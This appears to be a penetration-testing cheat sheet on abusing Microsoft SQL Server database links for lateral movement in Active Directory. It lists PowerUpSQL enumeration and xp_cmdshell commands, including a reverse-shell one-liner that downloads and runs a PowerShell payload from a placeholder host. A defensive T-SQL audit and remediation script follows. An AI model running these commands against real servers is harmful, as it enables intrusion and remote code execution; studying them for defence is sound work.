MSSQL Server Trust Abuse
Within Windows domains, MSSQL is widely deployed, often on dedicated servers that users from other machines connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement, since domain users can be mapped to database roles.
What we can also take advantage of are database links. SQL Servers within a network are often accessible to each other, and the links between databases give us a way to traverse the Active Directory network by indirectly executing commands on remote servers without leaving our current position. This works not only across domain trusts within a forest, but between separate forests as well.
These attacks can also go relatively undetected, because you execute commands on distant SQL Servers from your own machine without ever connecting to them directly.
Enumeration
We can use PowerUpSQL.ps1 to enumerate SQL Servers.
Finding SQL Server Instances That Have an SPN Registered with the Domain Controller, and Discovering Logon Sessions
Get-SQLInstanceDomain
Finding Accessible SQL Servers
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Retrieve Basic Server Information From Each Target SQL Server Instance
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Searching Database Links
Get-SQLServerLink -Instance <sql_server_domain> -Verbose
# Crawl the database links outward from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose
Now We Can Execute Commands
Check the results under the 'CustomQuery' field of the output
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"
Get a Reverse Shell
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"
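The defender-side counterpart to the link crawl and xp_cmdshell steps above, as an added example that is not part of the original notes: a T-SQL audit to run on each SQL Server you administer, listing its linked servers, the login each link runs under, and whether xp_cmdshell is enabled, followed by the remediation. The catalog views are the standard ones; <link_name> is a placeholder.

```sql
-- Added audit script (not from the original notes). Run as a sysadmin on each
-- instance to see the exposure that Get-SQLServerLinkCrawl would traverse.

-- 1. Linked servers, their credential mapping and whether RPC Out is enabled.
--    A link whose login mapping uses a fixed remote login (remote_name set and
--    uses_self_credential = 0) lets any local login allowed to use the link act
--    as that remote login on the far server. local_principal_id = 0 is the
--    default mapping that applies to all local logins.
SELECT  s.name                   AS link_name,
        s.data_source,
        s.product,
        s.is_rpc_out_enabled,        -- 1: EXEC ... AT <link> and xp_cmdshell via RPC work
        s.is_data_access_enabled,    -- 1: OPENQUERY through the link works
        ll.remote_name           AS mapped_remote_login,
        ll.uses_self_credential,
        CASE WHEN ll.local_principal_id = 0 THEN '(all local logins)'
             ELSE SUSER_NAME(ll.local_principal_id)
        END                      AS local_login
FROM    sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE   s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, ll.uses_self_credential ASC;

-- 2. Is xp_cmdshell enabled? value_in_use = 1 means the command-execution
--    step in the notes above works on this instance.
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'show advanced options');

-- 3. Remediation: disable xp_cmdshell, and turn RPC Out off on any link that
--    does not need to accept remote procedure calls.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_serveroption @server = N'<link_name>', @optname = 'rpc out', @optvalue = 'false';
```

Links that are flagged with RPC Out enabled and a fixed sysadmin remote login are the ones a crawl from a low-privileged instance can ride to command execution on the remote server.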